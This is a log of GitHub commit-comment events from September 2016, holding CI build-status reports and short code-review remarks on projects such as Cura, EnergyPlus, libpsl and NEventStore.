{"id":"4602643506","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19130732,"position":null,"line":null,"path":null,"commit_id":"755c23d52fc76a2f190f0ad59439181ded9f3bd6","created_at":"2016-09-22T14:03:19Z","updated_at":"2016-09-22T14:03:19Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6](http://build.prxm.it:8813/viewLog.html?buildId=3677&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:44"}},"created_at":"2016-09-22T14:03:19Z"}
{"id":"4602645049","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19130737,"position":null,"line":null,"path":null,"commit_id":"842606b3fc7815ff50fb0c6ecb91716f9b5185db","created_at":"2016-09-22T14:03:35Z","updated_at":"2016-09-22T14:03:35Z","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (1768 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T14:03:35Z"}
{"id":"4602648697","type":"CommitCommentEvent","actor":{"login":"bennn"},"repo":{"name":"nuprl/nuprl.github.io"},"payload":{"comment":{"id":19130747,"position":null,"line":null,"path":null,"commit_id":"743c20f730df34cc13f047cc4b8918853bdb0edf","created_at":"2016-09-22T14:04:12Z","updated_at":"2016-09-22T14:04:12Z","body":"swag"}},"created_at":"2016-09-22T14:04:12Z"}
{"id":"4602650556","type":"CommitCommentEvent","actor":{"login":"MatousJobanek"},"repo":{"name":"iocanel/arquillian-cube"},"payload":{"comment":{"id":19130752,"position":23,"line":29,"path":"kubernetes/kubernetes/src/main/java/org/arquillian/cube/kubernetes/impl/enricher/AbstractKubernetesResourceProvider.java","commit_id":"81bff2066c1abba4f5e63d97e48687aac563a002","created_at":"2016-09-22T14:04:29Z","updated_at":"2016-09-22T14:04:29Z","body":"if ((annotation instanceof Named) && (type.getName().equals(\"javax.inject.Named\"))"}},"created_at":"2016-09-22T14:04:29Z"}
{"id":"4602650843","type":"CommitCommentEvent","actor":{"login":"JeetKunDoug"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19130755,"position":84,"line":106,"path":"src/riak_kv_pb_index.erl","commit_id":"ccb019fdc02ad545a9914adc391c56d423550630","created_at":"2016-09-22T14:04:32Z","updated_at":"2016-09-22T14:04:32Z","body":"@lukebakken yea, I'm sure there are a ton of places depending on this behavior unfortunately - fair enough. I'll get the changes re-reviewed and search for places where we lost handling of `undefined`."}},"created_at":"2016-09-22T14:04:32Z"}
{"id":"4602652337","type":"CommitCommentEvent","actor":{"login":"bhenderson"},"repo":{"name":"bhenderson/minitest-ci"},"payload":{"comment":{"id":19130759,"position":null,"line":null,"path":null,"commit_id":"695c2fd5fb8a19f052c481c2c554b3a7f4c20ad1","created_at":"2016-09-22T14:04:46Z","updated_at":"2016-09-22T14:04:46Z","body":"yes, although it doesn't look like they've released a new version yet."}},"created_at":"2016-09-22T14:04:46Z"}
{"id":"4602652923","type":"CommitCommentEvent","actor":{"login":"MatousJobanek"},"repo":{"name":"iocanel/arquillian-cube"},"payload":{"comment":{"id":19130760,"position":23,"line":29,"path":"kubernetes/kubernetes/src/main/java/org/arquillian/cube/kubernetes/impl/enricher/AbstractKubernetesResourceProvider.java","commit_id":"81bff2066c1abba4f5e63d97e48687aac563a002","created_at":"2016-09-22T14:04:52Z","updated_at":"2016-09-22T14:04:52Z","body":"to make it clear what is expected..."}},"created_at":"2016-09-22T14:04:52Z"}
{"id":"4602660399","type":"CommitCommentEvent","actor":{"login":"coc4tm"},"repo":{"name":"laxex/C_O_M_R_E_D"},"payload":{"comment":{"id":19130779,"position":null,"line":null,"path":null,"commit_id":"034278c73b1104254d7243e6818091a56c043168","created_at":"2016-09-22T14:06:02Z","updated_at":"2016-09-22T14:06:02Z","body":"Great :+1: "}},"created_at":"2016-09-22T14:06:02Z"}
{"id":"4602661112","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19130780,"position":8,"line":820,"path":"cura/CuraApplication.py","commit_id":"4e3384e6406bd3eecf082e594080bd86d68b8234","created_at":"2016-09-22T14:06:09Z","updated_at":"2016-09-22T14:06:09Z","body":"In python the following is true; bool([]) == False). So the len is not required. "}},"created_at":"2016-09-22T14:06:09Z"}
{"id":"4602661464","type":"CommitCommentEvent","actor":{"login":"hellais"},"repo":{"name":"TheTorProject/lepidopter"},"payload":{"comment":{"id":19130782,"position":4,"line":4,"path":"ChangeLog.md","commit_id":"e73a7b3d26b6d08882f34ccb6cba129bd92a0a48","created_at":"2016-09-22T14:06:12Z","updated_at":"2016-09-22T14:06:12Z","body":"Also maybe it's worth to mention that this bug leads to auto update not working in versions prior to this."}},"created_at":"2016-09-22T14:06:12Z"}
{"id":"4602666084","type":"CommitCommentEvent","actor":{"login":"chrisma"},"repo":{"name":"hpi-swt2/wimi-portal"},"payload":{"comment":{"id":19130790,"position":18,"line":26,"path":"app/views/time_sheets/_form.html.erb","commit_id":"eb4ca622607091929aba300f299c7894e74263dc","created_at":"2016-09-22T14:06:56Z","updated_at":"2016-09-22T14:06:56Z","body":"Is Javascript really necessary here? Can the `#submit` element not be placed inside the form and positioned with CSS? Or is this too much trouble with the sidebar?"}},"created_at":"2016-09-22T14:06:56Z"}
{"id":"4602667380","type":"CommitCommentEvent","actor":{"login":"warmdev"},"repo":{"name":"comses/miracle"},"payload":{"comment":{"id":19130793,"position":null,"line":null,"path":null,"commit_id":"00b18217779636548bd2641b57c28269ef5c1de4","created_at":"2016-09-22T14:07:09Z","updated_at":"2016-09-22T14:07:09Z","body":"Install an older version of Shiny from CRAN will fix it for now. Login to the container as root and run R, then\r\n\r\n```\r\ninstall_url(\"https://cran.r-project.org/src/contrib/Archive/shiny/shiny_0.13.2.tar.gz\")\r\n```"}},"created_at":"2016-09-22T14:07:09Z"}
{"id":"4602668346","type":"CommitCommentEvent","actor":{"login":"jessegreenberg"},"repo":{"name":"phetsims/gravity-and-orbits"},"payload":{"comment":{"id":19130794,"position":null,"line":null,"path":null,"commit_id":"49fcc5407072c3af96ae35d1be3341f32ac6be4b","created_at":"2016-09-22T14:07:18Z","updated_at":"2016-09-22T14:07:18Z","body":"Actually related to #216."}},"created_at":"2016-09-22T14:07:18Z"}
{"id":"4602669597","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19130797,"position":null,"line":null,"path":null,"commit_id":"2944b6f92dca913a9c6bded35ed277bff65a3601","created_at":"2016-09-22T14:07:29Z","updated_at":"2016-09-22T14:07:29Z","body":"I'm trying use the accessor methods in ```Member```, e.g\r\n```\r\n    public function getCollegeNameAttribute() {\r\n        if (isset($this->college)) {\r\n            return $this->college->name;\r\n        } else {\r\n            return null;\r\n        }\r\n    }\r\n```\r\nbut ```isset($this->college)``` is returning false even though ```$this->college``` returns a non null value.\r\nAny ideas why?"}},"created_at":"2016-09-22T14:07:29Z"}
{"id":"4602673028","type":"CommitCommentEvent","actor":{"login":"pprao1234"},"repo":{"name":"pprao1234/imad-2016-app"},"payload":{"comment":{"id":19130801,"position":null,"line":null,"path":null,"commit_id":"ddbc9db98fad1aef0fe5d3350be558e84b3bae77","created_at":"2016-09-22T14:07:49Z","updated_at":"2016-09-22T14:07:49Z","body":"![untitled111](https://cloud.githubusercontent.com/assets/22261200/18751256/fd7c3c44-80fb-11e6-87b2-96f819cb2d65.jpg)\r\n"}},"created_at":"2016-09-22T14:07:49Z"}
{"id":"4602675062","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19130803,"position":27,"line":81,"path":"plugins/PerObjectSettingsTool/PerObjectSettingVisibilityHandler.py","commit_id":"c13003c960185a8f5d77a8235d6f7f4aa4befa03","created_at":"2016-09-22T14:08:07Z","updated_at":"2016-09-22T14:08:07Z","body":"Nope :) These are ignored. But i do want them to be there, due to visibility. It works like a charm. "}},"created_at":"2016-09-22T14:08:07Z"}
{"id":"4602675081","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19130804,"position":29,"line":472,"path":"cura/BuildVolume.py","commit_id":"4141a878871a95964d219cb5ebb042ba2a8e241f","created_at":"2016-09-22T14:08:08Z","updated_at":"2016-09-22T14:08:08Z","body":"Code style: Spaces around binary operators. Fixed that for you in 8bf8a483ec3ac30b1e63f64d0dd7aac4877a9d68."}},"created_at":"2016-09-22T14:08:08Z"}
{"id":"4602678947","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19130811,"position":null,"line":null,"path":null,"commit_id":"559a8b5ada0905037bd2ccef5b46b8eb984d7d41","created_at":"2016-09-22T14:08:42Z","updated_at":"2016-09-22T14:08:42Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2334 of 2335 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T14:08:42Z"}
{"id":"4602681036","type":"CommitCommentEvent","actor":{"login":"whitequark"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":19130819,"position":null,"line":null,"path":null,"commit_id":"a0291ceddc19c445419754a26df04cb71fe9b699","created_at":"2016-09-22T14:09:02Z","updated_at":"2016-09-22T14:09:02Z","body":"@sbourdeauducq ack"}},"created_at":"2016-09-22T14:09:02Z"}
{"id":"4602685683","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19130825,"position":22,"line":465,"path":"cura/BuildVolume.py","commit_id":"4141a878871a95964d219cb5ebb042ba2a8e241f","created_at":"2016-09-22T14:09:47Z","updated_at":"2016-09-22T14:09:47Z","body":"This function should probably be in `ExtruderManager` or `MachineManager`, not in `BuildVolume`. It has nothing to do with the build volume."}},"created_at":"2016-09-22T14:09:47Z"}
{"id":"4602685811","type":"CommitCommentEvent","actor":{"login":"chrisma"},"repo":{"name":"hpi-swt2/wimi-portal"},"payload":{"comment":{"id":19130826,"position":34,"line":39,"path":"app/views/time_sheets/_form.html.erb","commit_id":"eb4ca622607091929aba300f299c7894e74263dc","created_at":"2016-09-22T14:09:48Z","updated_at":"2016-09-22T14:09:48Z","body":"Why is `disable_date` necessary, i.e. why the `readonly` attribute of dates toggled separately?"}},"created_at":"2016-09-22T14:09:48Z"}
{"id":"4602686474","type":"CommitCommentEvent","actor":{"login":"joeberkovitz"},"repo":{"name":"WebAudio/web-audio-api"},"payload":{"comment":{"id":19130827,"position":56,"line":3421,"path":"index.html","commit_id":"77323cf07a408fb490efaad3d738b19ca3fe2ee3","created_at":"2016-09-22T14:09:55Z","updated_at":"2016-09-22T14:09:55Z","body":"Need to research whether ramping of a noise gate is best linear or exponential. Approach may vary for attack vs release."}},"created_at":"2016-09-22T14:09:55Z"}
{"id":"4602686535","type":"CommitCommentEvent","actor":{"login":"carolinecollaco"},"repo":{"name":"carolinecollaco/XMLParsing"},"payload":{"comment":{"id":19130828,"position":13,"line":46,"path":"NetBeansProjects/XMLParsing/src/xmlparsing/XMLParsing.java","commit_id":"0da70edc4f38c62372e0bf193735f4cff27ca167","created_at":"2016-09-22T14:09:56Z","updated_at":"2016-09-22T14:09:56Z","body":"Teste"}},"created_at":"2016-09-22T14:09:56Z"}
{"id":"4602689152","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19130833,"position":19,"line":76,"path":"plugins/PerObjectSettingsTool/PerObjectSettingVisibilityHandler.py","commit_id":"c13003c960185a8f5d77a8235d6f7f4aa4befa03","created_at":"2016-09-22T14:10:21Z","updated_at":"2016-09-22T14:10:21Z","body":"1. yes.\r\n2. Nope. Try the code, it works. If the stack is None, I add the instance with a None property. This means that if anyone asks for that value, the per object setting is ignored. This is one of those cases where code seems to be wrong but does work as intended."}},"created_at":"2016-09-22T14:10:21Z"}
{"id":"4602689380","type":"CommitCommentEvent","actor":{"login":"paytonrules"},"repo":{"name":"hnlee/httpserver"},"payload":{"comment":{"id":19130834,"position":null,"line":null,"path":null,"commit_id":"fe1b303fa825d859ff9c5a71d771948559ae78ea","created_at":"2016-09-22T14:10:24Z","updated_at":"2016-09-22T14:10:24Z","body":"(cough)Unit test?(cough)"}},"created_at":"2016-09-22T14:10:24Z"}
{"id":"4602691489","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19130836,"position":null,"line":null,"path":null,"commit_id":"d1d07405cece965dce5b9f01507617ee745712b4","created_at":"2016-09-22T14:10:43Z","updated_at":"2016-09-22T14:10:43Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.7-PullRequest.44+2](http://build.prxm.it:8813/viewLog.html?buildId=3678&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:45"}},"created_at":"2016-09-22T14:10:43Z"}
{"id":"4602691545","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19130837,"position":null,"line":null,"path":null,"commit_id":"d1d07405cece965dce5b9f01507617ee745712b4","created_at":"2016-09-22T14:10:44Z","updated_at":"2016-09-22T14:10:44Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.7-PullRequest.44+2](http://build.prxm.it:8813/viewLog.html?buildId=3678&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:45"}},"created_at":"2016-09-22T14:10:44Z"}
{"id":"4602691777","type":"CommitCommentEvent","actor":{"login":"jeff1evesque"},"repo":{"name":"protojas/machine-learning"},"payload":{"comment":{"id":19130838,"position":20,"line":20,"path":"test/manual/authentication/pytest_validate_password.py","commit_id":"f21e303503825396d62e75c4ce47925103779f8d","created_at":"2016-09-22T14:10:46Z","updated_at":"2016-09-22T14:10:46Z","body":"I would change your list syntax to the following:\r\n\r\n```python\r\n    passwords = [\r\n        'abcdefghij123', # just right\r\n        'ABCDEFGHIJ123', # just right\r\n        'abcDEFGHIJ123', # just right\r\n        'abcdefgh1',     # too short\r\n        'abcdefghijk',   # no numbers\r\n        '12345678911',   # no letters\r\n        'abcdefghIJK',   # no numbers\r\n        'a1' * 65   # too long\r\n    ]\r\n```"}},"created_at":"2016-09-22T14:10:46Z"}
{"id":"4602693683","type":"CommitCommentEvent","actor":{"login":"robertogagliotta"},"repo":{"name":"robertogagliotta/openemr"},"payload":{"comment":{"id":19130840,"position":null,"line":null,"path":null,"commit_id":"6c33d2577bc06f85f69dacee936ef7999055428c","created_at":"2016-09-22T14:11:04Z","updated_at":"2016-09-22T14:11:04Z","body":"Hi Brady\r\nThis single change made the magic. \r\nSnomedCT_RF1Release_INT_20160731.zip was load. Unit testing ok at fee sheet-> Snomed Clinical -> search\r\n\r\n"}},"created_at":"2016-09-22T14:11:04Z"}
{"id":"4602696557","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19130844,"position":null,"line":null,"path":null,"commit_id":"c8fd7f15cef17a79065ea0b9ded12897c40c4d54","created_at":"2016-09-22T14:11:31Z","updated_at":"2016-09-22T14:11:31Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5UYhmy8a&#x2F;27-as-a-product-owner-i-want-to-validate-users-before-sending-their-data-to-the-database-so-that-we-have-revelant-information-in-ou\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As a Product Owner I want to validate Users before sending their data to the database,so that we have revelant information in our system</a>"}},"created_at":"2016-09-22T14:11:31Z"}
{"id":"4602696577","type":"CommitCommentEvent","actor":{"login":"daurnimator"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19130845,"position":85,"line":1715,"path":"src/psl.c","commit_id":"e2812e8c4cff7daba154f851945fd1e217a1ffb6","created_at":"2016-09-22T14:11:31Z","updated_at":"2016-09-22T14:11:31Z","body":"This branch was entirely removed.\r\n\r\nIt looks like it was incorrect in the first place, but just checking with you."}},"created_at":"2016-09-22T14:11:31Z"}
{"id":"4602697732","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19130846,"position":null,"line":null,"path":null,"commit_id":"085ed01712988940fe8fc494939e3a9e713d0e9d","created_at":"2016-09-22T14:11:42Z","updated_at":"2016-09-22T14:11:42Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5UYhmy8a&#x2F;27-as-a-product-owner-i-want-to-validate-users-before-sending-their-data-to-the-database-so-that-we-have-revelant-information-in-ou\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As a Product Owner I want to validate Users before sending their data to the database,so that we have revelant information in our system</a>"}},"created_at":"2016-09-22T14:11:42Z"}
{"id":"4602699148","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19130849,"position":null,"line":null,"path":null,"commit_id":"c932f14686b188f178e0a8813e431cbb3be7e557","created_at":"2016-09-22T14:11:56Z","updated_at":"2016-09-22T14:11:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5UYhmy8a&#x2F;27-as-a-product-owner-i-want-to-validate-users-before-sending-their-data-to-the-database-so-that-we-have-revelant-information-in-ou\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As a Product Owner I want to validate Users before sending their data to the database,so that we have revelant information in our system</a>"}},"created_at":"2016-09-22T14:11:56Z"}
{"id":"4602699458","type":"CommitCommentEvent","actor":{"login":"luccioman"},"repo":{"name":"yacy/yacy_search_server"},"payload":{"comment":{"id":19130850,"position":null,"line":null,"path":null,"commit_id":"b3b75b0498a4405f094cd4faa95e01a117c6d1f4","created_at":"2016-09-22T14:11:59Z","updated_at":"2016-09-22T14:11:59Z","body":"I meant : \"add a customizable alternative text to YaCy **logo**\""}},"created_at":"2016-09-22T14:11:59Z"}
{"id":"4602702450","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130853,"position":null,"line":null,"path":null,"commit_id":"e22016062ee776090297569f6bed8658e1fbb20b","created_at":"2016-09-22T14:12:26Z","updated_at":"2016-09-22T14:12:26Z","body":"fast-forwarding master to borshop-integration-364-crash_log_undefined = 049f3a93"}},"created_at":"2016-09-22T14:12:26Z"}
{"id":"4602702536","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130854,"position":null,"line":null,"path":null,"commit_id":"fce24bc87685a36a68c4db846a86f6a646f0a920","created_at":"2016-09-22T14:12:26Z","updated_at":"2016-09-22T14:12:26Z","body":"Merge sha c2adae71 is stale."}},"created_at":"2016-09-22T14:12:26Z"}
{"id":"4602702596","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130855,"position":null,"line":null,"path":null,"commit_id":"fce24bc87685a36a68c4db846a86f6a646f0a920","created_at":"2016-09-22T14:12:27Z","updated_at":"2016-09-22T14:12:27Z","body":"merging basho/lager/bugfix_dr_lager_file_backend_old_config_compat = fce24bc8 into borshop-integration-374-bugfix_dr_lager_file_backend_old_config_compat"}},"created_at":"2016-09-22T14:12:27Z"}
{"id":"4602702636","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130856,"position":null,"line":null,"path":null,"commit_id":"fce24bc87685a36a68c4db846a86f6a646f0a920","created_at":"2016-09-22T14:12:27Z","updated_at":"2016-09-22T14:12:27Z","body":"basho/lager/bugfix_dr_lager_file_backend_old_config_compat = fce24bc8 merged ok, testing candidate = e7b14646"}},"created_at":"2016-09-22T14:12:27Z"}
{"id":"4602703093","type":"CommitCommentEvent","actor":{"login":"LMESTM"},"repo":{"name":"ARMmbed/mbed-os"},"payload":{"comment":{"id":19130858,"position":68,"line":861,"path":"hal/targets.json","commit_id":"e68b550c2a3671f82d2a8e7a0b3d24df8e48c275","created_at":"2016-09-22T14:12:31Z","updated_at":"2016-09-22T14:12:31Z","body":"oops ... must have happened during one of the many rebase operations :-(\r\nOne do you suggest to solve it ? was this already merged ?"}},"created_at":"2016-09-22T14:12:31Z"}
{"id":"4602705600","type":"CommitCommentEvent","actor":{"login":"paytonrules"},"repo":{"name":"hnlee/httpserver"},"payload":{"comment":{"id":19130862,"position":2,"line":26,"path":"src/httpserver/operator.clj","commit_id":"fe1b303fa825d859ff9c5a71d771948559ae78ea","created_at":"2016-09-22T14:12:55Z","updated_at":"2016-09-22T14:12:55Z","body":"You can destructure this for some conciseness. \r\n\r\n```\r\n(let [[uri method] (request/parse client-request)\r\n        decoded-uri (decode-uri uri)\r\n        path (str dir decoded-uri)])\r\n```"}},"created_at":"2016-09-22T14:12:55Z"}
{"id":"4602707187","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19130869,"position":null,"line":null,"path":null,"commit_id":"842606b3fc7815ff50fb0c6ecb91716f9b5185db","created_at":"2016-09-22T14:13:11Z","updated_at":"2016-09-22T14:13:11Z","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (1768 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T14:13:11Z"}
{"id":"4602707466","type":"CommitCommentEvent","actor":{"login":"markjose"},"repo":{"name":"markjose/sl-slack-intranet-bot"},"payload":{"comment":{"id":19130870,"position":34,"line":24,"path":"src/modules/directory.js","commit_id":"8f593147ae1300ecaddccafe594fdbe5d9f1eb6b","created_at":"2016-09-22T14:13:14Z","updated_at":"2016-09-22T14:13:14Z","body":"This now doesn't handle 07 :("}},"created_at":"2016-09-22T14:13:14Z"}
{"id":"4602708246","type":"CommitCommentEvent","actor":{"login":"jeff1evesque"},"repo":{"name":"protojas/machine-learning"},"payload":{"comment":{"id":19130872,"position":28,"line":28,"path":"test/manual/authentication/pytest_validate_password.py","commit_id":"f21e303503825396d62e75c4ce47925103779f8d","created_at":"2016-09-22T14:13:21Z","updated_at":"2016-09-22T14:13:21Z","body":"Same here.  It's just easier to read, and consistent with [repository syntax](https://github.com/jeff1evesque/machine-learning/blob/master/brain/load_data.py#L38-L43)."}},"created_at":"2016-09-22T14:13:21Z"}
{"id":"4602708433","type":"CommitCommentEvent","actor":{"login":"rockdaboot"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19130873,"position":66,"line":1681,"path":"src/psl.c","commit_id":"e2812e8c4cff7daba154f851945fd1e217a1ffb6","created_at":"2016-09-22T14:13:23Z","updated_at":"2016-09-22T14:13:23Z","body":"Thanks. Was in the middle of a test... didn't remember it when returning from lunch :sleepy: \r\nStill have to add testing for encoding != utf-8 - the idn/idn2 code looks buggy to me."}},"created_at":"2016-09-22T14:13:23Z"}
{"id":"4602708497","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19130874,"position":null,"line":null,"path":null,"commit_id":"09e3b01d9e1d27543fdfa8ac3fb766b50094214a","created_at":"2016-09-22T14:13:24Z","updated_at":"2016-09-22T14:13:24Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.7-beta.1](http://build.prxm.it:8813/viewLog.html?buildId=3679&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:42"}},"created_at":"2016-09-22T14:13:24Z"}
{"id":"4602708582","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19130875,"position":null,"line":null,"path":null,"commit_id":"09e3b01d9e1d27543fdfa8ac3fb766b50094214a","created_at":"2016-09-22T14:13:25Z","updated_at":"2016-09-22T14:13:25Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.7-beta.1](http://build.prxm.it:8813/viewLog.html?buildId=3679&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:42"}},"created_at":"2016-09-22T14:13:25Z"}
{"id":"4602712368","type":"CommitCommentEvent","actor":{"login":"simonrozsival"},"repo":{"name":"ReCodEx/api"},"payload":{"comment":{"id":19130885,"position":29,"line":29,"path":"app/model/repository/ReferenceExerciseSolutions.php","commit_id":"13789e4222d100ab40282a153fff69b27e7d2b96","created_at":"2016-09-22T14:14:01Z","updated_at":"2016-09-22T14:14:01Z","body":"wrong typehint"}},"created_at":"2016-09-22T14:14:01Z"}
{"id":"4602713630","type":"CommitCommentEvent","actor":{"login":"simonrozsival"},"repo":{"name":"ReCodEx/api"},"payload":{"comment":{"id":19130889,"position":29,"line":29,"path":"app/model/repository/ReferenceSolutionEvaluations.php","commit_id":"13789e4222d100ab40282a153fff69b27e7d2b96","created_at":"2016-09-22T14:14:13Z","updated_at":"2016-09-22T14:14:13Z","body":"wrong typehint"}},"created_at":"2016-09-22T14:14:13Z"}
{"id":"4602723266","type":"CommitCommentEvent","actor":{"login":"simonrozsival"},"repo":{"name":"ReCodEx/api"},"payload":{"comment":{"id":19130923,"position":64,"line":64,"path":"app/model/entity/ReferenceSolutionEvaluation.php","commit_id":"13789e4222d100ab40282a153fff69b27e7d2b96","created_at":"2016-09-22T14:15:45Z","updated_at":"2016-09-22T14:15:45Z","body":"we should also extract the main outcomes so we don't have to parse the results YAML each time - for each test memory + time usage"}},"created_at":"2016-09-22T14:15:45Z"}
{"id":"4602724873","type":"CommitCommentEvent","actor":{"login":"asarfraaz"},"repo":{"name":"naveenbajaj123/python"},"payload":{"comment":{"id":19130926,"position":null,"line":null,"path":null,"commit_id":"ce32f1dd313b60a079dc418eead4bc97b8b9cc27","created_at":"2016-09-22T14:16:00Z","updated_at":"2016-09-22T14:16:00Z","body":"Looks good.\r\n\r\nFew comments : \r\n1> What is the need for the check in line 12 ?\r\n2> Looks like the understanding of the question for 3 digit input case is not proper. The operations in line 13 is not according to the requirement. Please check again.\r\n\r\n3> It is not a good practise to use the same variable name \"output1\" in two different functions, especially when they hold the same value.\r\n\r\n4> In line 6, \"unit2\" variable is redundant. And so is \"unit\" variable in line 22. Can you try to eliminate them ?\r\n\r\n5> The code written in lines 24 and 25 is not required by the question. Though it can be debated that it is good to have, the customer can always come back and say that it does not meet the requirements.\r\n\r\n6> Since the operations done in lines 10 and 11 are very similar to what is done in function \"get_number\", why can't we modify the code in lines 10 and 11 to use \"get_number\" function ?\r\n\r\n7> Though the order in which the code checks the various conditions in its \"if\" and \"elif\" conditions does not matter, it is good programming practise to follow a simple pattern of code flow. The present code seems to haphazardly check the conditions in any order. It could either go with the order mentioned in the question, or follow a pattern of its choice. Can you try to improve the code based on this ?\r\n\r\n8> I see some unwanted spaces in lines 2, 4 , 11 and 28. May be you can be more strict while using spaces in your code. It makes the code looks more aesthetically neat for anyone who reads it."}},"created_at":"2016-09-22T14:16:00Z"}
